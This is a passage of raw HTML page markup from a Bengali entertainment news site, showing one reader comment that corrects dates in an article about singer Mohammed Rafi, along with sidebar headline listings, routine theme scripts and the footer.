            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://banglalive.com/how-was-md-rafi-as-a-person/&amp;media=http://banglalive.com/wp-content/uploads/2017/07/rafi-new-1.jpg" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-pinterest"></div><div class="td-social-but-text">Pinterest</div></a>
            </div></div>                	<!-- ___________ADDED_BY_SANNY_____________ --> 
        
	<!-- ___________ADDED_BY_SANNY_____________ -->


        <meta itemprop="author" content = "বিয়াস">    </footer>

    
                        <div class="comments" id="comments">
                                                                                                <div class="comments-title-wrap">
                                                                                <h4 class="block-title"><span>1 COMMENT</span></h4>
                                    </div>

                                                                            <ol class="comment-list">
                                                                        <li class="comment " id="li-comment-11439">
                    <article>
                        <footer>
                            <img src="http://0.gravatar.com/avatar/63c1956883f45f193a87e8dc0dd54dc1?s=50&#038;d=identicon&#038;r=g" width="50" height="50" alt="" class="avatar avatar-50 wp-user-avatar wp-user-avatar-50 photo avatar-default" />                            <cite>Kaushik Maitra</cite>

                                <a class="comment-link" href="#li-comment-11439">
                                    <time pubdate="1501520000">Jul 31, 2017 at 10:23 pm</time>
                                </a>

                        </footer>
                        <div class="comment-content">
                            <p>Eshob lekha gulo bondho korun. &#8220;Shaan&#8221; 1980 r film aar S D Burman maara gechhen 1975 e. Ta chhara 1969 theke 1980 obdhi R D Burman er beshir bhaag film ei Rafi r gaan chhilo. Taar modhye  ei gulo r katha apnaara na janleo onno lok e jane&#8212;&#8211; Raaton Ka Raja, Caravan, The Train, Mela, Yaadon Ki Baaraat, Hum Kisi Se Kam Nahin, Benaam, Dil Ka Raja etc. Golpo banaate geleo information lage moshaai.</p>

                        </div>
                        <div class="comment-meta" id="comment-11439">
                            <a rel='nofollow' class='comment-reply-link' href='http://banglalive.com/how-was-md-rafi-as-a-person/?replytocom=11439#respond' onclick='return addComment.moveForm( "comment-11439", "11439", "respond", "208502" )' aria-label='Reply to Kaushik Maitra'>       </a>                        </div>

                    </article>
                </li>
            </li><!-- #comment-## -->
                                        </ol>
                                        <div class="comment-pagination">
                                                                                    </div>
                                                                                            	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">      <small><a rel="nofollow" id="cancel-comment-reply-link" href="/how-was-md-rafi-as-a-person/#respond" style="display:none;">     </a></small></h3>			<form action="http://banglalive.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
				<div class="clearfix"></div><p class="comment-form-input-wrap"><textarea class="needsclick" placeholder="Comment:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea></p><p class="comment-form-input-wrap">
            <span class="comment-req-wrap needsclick"><input class="" id="author" name="author" placeholder="নাম" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
            <span class="comment-req-wrap needsclick"><input class="" id="email" name="email" placeholder="ই মেইল        " type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap needsclick">
            <input class="" id="url" name="url" placeholder="ওয়েবসাইট" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='208502' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>			</form>
			</div><!-- #respond -->
	                                                    </div> <!-- /.content -->


<div class="art-img-text-down similar-articles"><h4 class="block-title"><span>এমন আরো নিবন্ধ       </span></h4>

	<div class="wpb_row row-fluid">

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/kishore-kumaar-was-not-happy-with-his-married-life/" rel="bookmark" title="বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার"><img width="326" height="159" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/kishore-new-326x159.jpg" alt="" title="বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/kishore-kumaar-was-not-happy-with-his-married-life/" rel="bookmark" title="বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার">বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T12:35:40+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="http://banglalive.com/kishore-kumaar-was-not-happy-with-his-married-life/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-208690">238</span></div>        </div>


        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        
	</div> <!-- ./span6 -->

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/some-lesserknown-stories-of-kishore-kumar/" rel="bookmark" title="আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;"><img width="326" height="159" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2016/08/kishore-kumar-unknown-326x159.jpg" alt="kishore Kumar unknown stories" title="আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/some-lesserknown-stories-of-kishore-kumar/" rel="bookmark" title="আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;">আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T11:55:49+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="http://banglalive.com/some-lesserknown-stories-of-kishore-kumar/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-193239">759</span></div>        </div>


        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        
	</div> <!-- ./span6 --></div><!--./row-fluid--></div>                    </div>
                    <div class=" raaz_sanny span4 column_container td-post-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
                        <script>var block_td_uid_13_598490d3d48de = new td_block();
block_td_uid_13_598490d3d48de.id = "td_uid_13_598490d3d48de";
block_td_uid_13_598490d3d48de.atts = '{"category_id":"3","category_ids":"","tag_slug":"","sort":"","autors_id":"","hide_title":"","installed_post_types":"","limit":"3","offset":"","header_color":"#000","header_text_color":"#f7a701","custom_title":"","custom_url":"","title_style":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","ajax_pagination_infinite_stop":""}';
block_td_uid_13_598490d3d48de.td_cur_cat = "3";
block_td_uid_13_598490d3d48de.td_column_number = "1";
block_td_uid_13_598490d3d48de.block_type = "4";
block_td_uid_13_598490d3d48de.post_count = "3";
block_td_uid_13_598490d3d48de.found_posts = "6646";
block_td_uid_13_598490d3d48de.max_num_pages = "2216";
block_td_uid_13_598490d3d48de.header_color = "#000";
block_td_uid_13_598490d3d48de.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_13_598490d3d48de);
</script><div class="td_block_wrap td_block4"><h4 style="border-bottom: 2px solid #000" class="block-title"><a style="background-color:#000; color:#f7a701 !important" href="http://banglalive.com/category/news/general-news/">নিউজ MARKET</a></h4><style>.ui-sctd_uid_13_598490d3d48de .cur-sub-cat { color:#000 !important}</style><div id=td_uid_13_598490d3d48de class="td_block_inner">
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/queen-victoria-never-was-willing-to-breastfeed-her-children/" rel="bookmark" title="সন্তানদের স্তন্যপান না করিয়ে রাজ পরিবারের রীতি ভেঙেছিলেন এই সম্রাজ্ঞী"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/victoria-new-100x65.jpg" alt="" title="সন্তানদের স্তন্যপান না করিয়ে রাজ পরিবারের রীতি ভেঙেছিলেন এই সম্রাজ্ঞী"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/queen-victoria-never-was-willing-to-breastfeed-her-children/" rel="bookmark" title="সন্তানদের স্তন্যপান না করিয়ে রাজ পরিবারের রীতি ভেঙেছিলেন এই সম্রাজ্ঞী">সন্তানদের স্তন্যপান না করিয়ে রাজ পরিবারের রীতি ভেঙেছিলেন এই সম্রাজ্ঞী</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T19:41:47+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/mother-is-learning-english-to-read-daughters-book/" rel="bookmark" title="মেয়ের লেখা বই পড়বেন বলে ইংরেজি শিখছেন মা"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/malala-new-100x65.jpg" alt="" title="মেয়ের লেখা বই পড়বেন বলে ইংরেজি শিখছেন মা"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/mother-is-learning-english-to-read-daughters-book/" rel="bookmark" title="মেয়ের লেখা বই পড়বেন বলে ইংরেজি শিখছেন মা">মেয়ের লেখা বই পড়বেন বলে ইংরেজি শিখছেন মা</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T19:05:58+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/chala-jaata-hoon-kisi-ki-dhun-me-dhadakte-dil-ke-taraane-liye/" rel="bookmark" title="কঠিন মুহূর্তের গোপন সঙ্গীকে জন্মদিনে স্মরণ করলেন বীরেন্দ্র শেওয়াগ"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/sehwag-new-100x65.jpg" alt="" title="কঠিন মুহূর্তের গোপন সঙ্গীকে জন্মদিনে স্মরণ করলেন বীরেন্দ্র শেওয়াগ"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/chala-jaata-hoon-kisi-ki-dhun-me-dhadakte-dil-ke-taraane-liye/" rel="bookmark" title="কঠিন মুহূর্তের গোপন সঙ্গীকে জন্মদিনে স্মরণ করলেন বীরেন্দ্র শেওয়াগ">কঠিন মুহূর্তের গোপন সঙ্গীকে জন্মদিনে স্মরণ করলেন বীরেন্দ্র শেওয়াগ</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T18:37:16+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        </div></div> <!-- ./block1 --><script>var block_td_uid_15_598490d3e5ffa = new td_block();
block_td_uid_15_598490d3e5ffa.id = "td_uid_15_598490d3e5ffa";
block_td_uid_15_598490d3e5ffa.atts = '{"category_id":"164","category_ids":"","tag_slug":"","sort":"","autors_id":"","hide_title":"","installed_post_types":"","limit":"3","offset":"","header_color":"#000","header_text_color":"#f7a701","custom_title":"","custom_url":"","title_style":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","ajax_pagination_infinite_stop":""}';
block_td_uid_15_598490d3e5ffa.td_cur_cat = "164";
block_td_uid_15_598490d3e5ffa.td_column_number = "1";
block_td_uid_15_598490d3e5ffa.block_type = "4";
block_td_uid_15_598490d3e5ffa.post_count = "3";
block_td_uid_15_598490d3e5ffa.found_posts = "4823";
block_td_uid_15_598490d3e5ffa.max_num_pages = "1608";
block_td_uid_15_598490d3e5ffa.header_color = "#000";
block_td_uid_15_598490d3e5ffa.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_15_598490d3e5ffa);
</script><div class="td_block_wrap td_block4"><h4 style="border-bottom: 2px solid #000" class="block-title"><a style="background-color:#000; color:#f7a701 !important" href="http://banglalive.com/category/entertainment/">বিনোদন</a></h4><style>.ui-sctd_uid_15_598490d3e5ffa .cur-sub-cat { color:#000 !important}</style><div id=td_uid_15_598490d3e5ffa class="td_block_inner">
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/kishore-kumaar-was-not-happy-with-his-married-life/" rel="bookmark" title="বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/kishore-new-100x65.jpg" alt="" title="বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/kishore-kumaar-was-not-happy-with-his-married-life/" rel="bookmark" title="বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার">বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T12:35:40+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/some-lesserknown-stories-of-kishore-kumar/" rel="bookmark" title="আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2016/08/kishore-kumar-unknown-100x65.jpg" alt="kishore Kumar unknown stories" title="আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/some-lesserknown-stories-of-kishore-kumar/" rel="bookmark" title="আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;">আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T11:55:49+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/lipstick-under-my-burkha-film-review-in-bengali/" rel="bookmark" title="এমন একটা ছবি, যেখানে নম্বর কাটার কোথাও কোন সুযোগই নেই"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/lipstick-under-my-burkha-film-review-100x65.gif" alt="" title="এমন একটা ছবি, যেখানে নম্বর কাটার কোথাও কোন সুযোগই নেই"/></a><div class="eng-sanny-2 rating-movies21">
        <!--Yasr Overall Rating Shortcode-->
        <div class="rateit yasr_visitor_votes_stars_div" id="yasr_rateit_overall" data-rateit-starwidth="16" data-rateit-starheight="16" data-rateit-value="5" data-rateit-step="0.1" data-rateit-resetable="false" data-rateit-readonly="true"></div>
        <!--End Yasr Overall Rating Shortcode-->
         </div></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/lipstick-under-my-burkha-film-review-in-bengali/" rel="bookmark" title="এমন একটা ছবি, যেখানে নম্বর কাটার কোথাও কোন সুযোগই নেই">এমন একটা ছবি, যেখানে নম্বর কাটার কোথাও কোন সুযোগই নেই</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T11:09:18+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "অভিলাষ রায়">        </div>

        </div></div> <!-- ./block1 --><script>var block_td_uid_17_598490d405547 = new td_block();
block_td_uid_17_598490d405547.id = "td_uid_17_598490d405547";
block_td_uid_17_598490d405547.atts = '{"category_id":"140","category_ids":"","tag_slug":"","sort":"","autors_id":"","hide_title":"","installed_post_types":"","limit":"3","offset":"","header_color":"#000","header_text_color":"#f7a701","custom_title":"","custom_url":"","title_style":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","ajax_pagination_infinite_stop":""}';
block_td_uid_17_598490d405547.td_cur_cat = "140";
block_td_uid_17_598490d405547.td_column_number = "1";
block_td_uid_17_598490d405547.block_type = "4";
block_td_uid_17_598490d405547.post_count = "3";
block_td_uid_17_598490d405547.found_posts = "596";
block_td_uid_17_598490d405547.max_num_pages = "199";
block_td_uid_17_598490d405547.header_color = "#000";
block_td_uid_17_598490d405547.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_17_598490d405547);
</script><div class="td_block_wrap td_block4"><h4 style="border-bottom: 2px solid #000" class="block-title"><a style="background-color:#000; color:#f7a701 !important" href="http://banglalive.com/category/lifestyle/">লাইফস্টাইল</a></h4><style>.ui-sctd_uid_17_598490d405547 .cur-sub-cat { color:#000 !important}</style><div id=td_uid_17_598490d405547 class="td_block_inner">
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/home-remedies-to-make-your-eyebrows-thicker/" rel="bookmark" title="আই ব্রো পাতলা? ঘন ও সুন্দর করে তুলতে জেনে নিন ঘরোয়া টোটকা"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/eyebrows-new-100x65.jpg" alt="" title="আই ব্রো পাতলা? ঘন ও সুন্দর করে তুলতে জেনে নিন ঘরোয়া টোটকা"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/home-remedies-to-make-your-eyebrows-thicker/" rel="bookmark" title="আই ব্রো পাতলা? ঘন ও সুন্দর করে তুলতে জেনে নিন ঘরোয়া টোটকা">আই ব্রো পাতলা? ঘন ও সুন্দর করে তুলতে জেনে নিন ঘরোয়া টোটকা</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T18:08:39+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/5-signs-your-sex-life-needs-a-makeover/" rel="bookmark" title="৫টি এমন বিষয় যা বোঝায় আপনার যৌন জীবনের মেক ওভার দরকার"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/sex-makeover-100x65.jpg" alt="" title="৫টি এমন বিষয় যা বোঝায় আপনার যৌন জীবনের মেক ওভার দরকার"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/5-signs-your-sex-life-needs-a-makeover/" rel="bookmark" title="৫টি এমন বিষয় যা বোঝায় আপনার যৌন জীবনের মেক ওভার দরকার">৫টি এমন বিষয় যা বোঝায় আপনার যৌন জীবনের মেক ওভার দরকার</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T16:49:13+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/10-ways-help-child-handle-stress/" rel="bookmark" title="আপনার বাচ্চা স্ট্রেসের শিকার নয় তো? ১০টি উপায়ে আপনি ওকে সাহায্য করতে পারেন"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/stress-new-100x65.jpg" alt="" title="আপনার বাচ্চা স্ট্রেসের শিকার নয় তো? ১০টি উপায়ে আপনি ওকে সাহায্য করতে পারেন"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/10-ways-help-child-handle-stress/" rel="bookmark" title="আপনার বাচ্চা স্ট্রেসের শিকার নয় তো? ১০টি উপায়ে আপনি ওকে সাহায্য করতে পারেন">আপনার বাচ্চা স্ট্রেসের শিকার নয় তো? ১০টি উপায়ে আপনি ওকে সাহায্য করতে পারেন</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-04T16:00:43+00:00" >Aug 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "বাংলালাইভ">        </div>

        </div></div> <!-- ./block1 --><script>var block_td_uid_19_598490d40d963 = new td_block();
block_td_uid_19_598490d40d963.id = "td_uid_19_598490d40d963";
block_td_uid_19_598490d40d963.atts = '{"category_id":"11","category_ids":"","tag_slug":"","sort":"","autors_id":"","hide_title":"","installed_post_types":"","limit":"4","offset":"","header_color":"#000","header_text_color":"#f7a701","custom_title":"\u09b0\u09c7\u09b8\u09bf\u09aa\u09bf","custom_url":"","title_style":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","ajax_pagination_infinite_stop":""}';
block_td_uid_19_598490d40d963.td_cur_cat = "11";
block_td_uid_19_598490d40d963.td_column_number = "1";
block_td_uid_19_598490d40d963.block_type = "4";
block_td_uid_19_598490d40d963.post_count = "4";
block_td_uid_19_598490d40d963.found_posts = "298";
block_td_uid_19_598490d40d963.max_num_pages = "75";
block_td_uid_19_598490d40d963.header_color = "#000";
block_td_uid_19_598490d40d963.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_19_598490d40d963);
</script><div class="td_block_wrap td_block4"><h4 style="border-bottom: 2px solid #000" class="block-title"><a style="background-color:#000; color:#f7a701 !important" href="http://banglalive.com/category/best-recipes-in-bengali/">রেসিপি</a></h4><style>.ui-sctd_uid_19_598490d40d963 .cur-sub-cat { color:#000 !important}</style><div id=td_uid_19_598490d40d963 class="td_block_inner">
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/ilish-korma-dhakai-recipe-in-bengali/" rel="bookmark" title="ইলিশ কোরমা"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/ilisha-korma-dhakai-recipe-100x65.jpg" alt="" title="ইলিশ কোরমা"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/ilish-korma-dhakai-recipe-in-bengali/" rel="bookmark" title="ইলিশ কোরমা">ইলিশ কোরমা</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-06-30T17:05:40+00:00" >Jun 30, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "রুকমা দাক্ষী">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/unique-and-delicious-honey-cake-recipe-in-bengali/" rel="bookmark" title="হানি কেক"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/honey-cake-recipe-bengali-100x65.jpg" alt="" title="হানি কেক"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/unique-and-delicious-honey-cake-recipe-in-bengali/" rel="bookmark" title="হানি কেক">হানি কেক</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-06-22T17:48:26+00:00" >Jun 22, 2017</time><meta itemprop="interactionCount" content="UserComments:1"/>                            </div>
        </div>
        <meta itemprop="author" content = "অমিতাভ চক্রবর্তী">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/easy-to-cook-honey-chicken-tikka-recipe-in-bengali/" rel="bookmark" title="হানি চিকেন টিক্কা"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/honey-chicken-tikka-bengali-recipe-100x65.jpg" alt="" title="হানি চিকেন টিক্কা"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/easy-to-cook-honey-chicken-tikka-recipe-in-bengali/" rel="bookmark" title="হানি চিকেন টিক্কা">হানি চিকেন টিক্কা</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-06-16T15:03:44+00:00" >Jun 16, 2017</time><meta itemprop="interactionCount" content="UserComments:1"/>                            </div>
        </div>
        <meta itemprop="author" content = "রুকমা দাক্ষী">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://banglalive.com/easy-to-cook-keema-pulao-recipe-in-bengali/" rel="bookmark" title="কিমা পোলাও"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/keema-pulao-bengali-recipe-100x65.jpg" alt="" title="কিমা পোলাও"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/easy-to-cook-keema-pulao-recipe-in-bengali/" rel="bookmark" title="কিমা পোলাও">কিমা পোলাও</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-06-08T15:45:09+00:00" >Jun 8, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "রুকমা দাক্ষী">        </div>

        </div></div> <!-- ./block1 -->                    </div>
                
                             </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        </article> <!-- /.post -->            <div class="td-footer-wrap">
            <div class="container">
                <div class="row">
                    
                                <div class="span12">
                                    <div class="td-grid-wrap">
                                        <div class="container-fluid">
                                            <div class="wpb_row row-fluid ">
                                                <div class="span4 wpb_column column_container">
                                                    <div class="footer-logo-wrap"><img  class="td-retina-data" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2015/03/logo1.jpg" data-retina="http://blcdn-307f.kxcdn.com/wp-content/uploads/2015/03/logo1.jpg" alt=""/></div><div class="footer-text-wrap">Unauthorised copying or representation of any content, photograph, illustration or artwork from any section of this site is strictly prohibited.</div><div class="footer-email-wrap">Contact us: <a href="mailto:editor@celciusindia.com">editor@celciusindia.com</a></div>                                                </div>

                                                <div class="span4 wpb_column column_container">
                                                    <aside class="widget widget_text">			<div class="textwidget"><a href="http://banglalive.com/?p=184775"><img class="alignnone size-full wp-image-172667" style="width: 98%; margin-bottom: 10px;" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/05/podcast.png" alt="podcast" width="270" height="37"></a>
<iframe width="300" height="250" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player?url=https%3A%2F%2Fsoundcloud.com%2Fbanglalive-webportal%2Fsonghoti-jaanai-a-brand-new-protest-song&color=%23AA0114&visual=true"></iframe></div>
		</aside>                                                </div>
                                                <div class="span4 wpb_column column_container">
                                                    <div id=td_uid_21_598490d41872d class="td_block_wrap td_social widget widget_social"><h4 class="block-title"><span >সামাজিকতা</span></h4><div class="td_social_type"><span class="td-social-icon-wrap"><a rel="nofollow"  target="_blank" href="https://www.facebook.com/banglaliveofficial"><span class="td-social-s1-32 td-s-s-32-facebook"></span></a></span><span class="td_social_info">247,176</span><span class="td_social_info">Fans</span><span class="td_social_button"><a rel="nofollow" href="https://www.facebook.com/banglaliveofficial" target="_blank">Like</a></span></div><div class="td_social_type"><span class="td-social-icon-wrap"><a rel="nofollow"  target="_blank" href="https://plus.google.com/+banglalive"><span class="td-social-s1-32 td-s-s-32-googleplus"></span></a></span><span class="td_social_info">483</span><span class="td_social_info">Subscribers</span><span class="td_social_button"><a rel="nofollow" href="https://plus.google.com/+banglalive" target="_blank">+1</a></span></div><div class="td_social_type"><span class="td-social-icon-wrap"><a rel="nofollow"  target="_blank" href="https://twitter.com/Banglalive"><span class="td-social-s1-32 td-s-s-32-twitter"></span></a></span><span class="td_social_info">930</span><span class="td_social_info">Followers</span><span class="td_social_button"><a rel="nofollow" href="https://twitter.com/Banglalive" target="_blank">Follow</a></span></div><div class="td_social_type"><span class="td-social-icon-wrap"><a rel="nofollow"  target="_blank" href="http://www.youtube.com/user/banglami"><span class="td-social-s1-32 td-s-s-32-youtube"></span></a></span><span class="td_social_info">580</span><span class="td_social_info">Subscribers</span><span class="td_social_button"><a rel="nofollow" 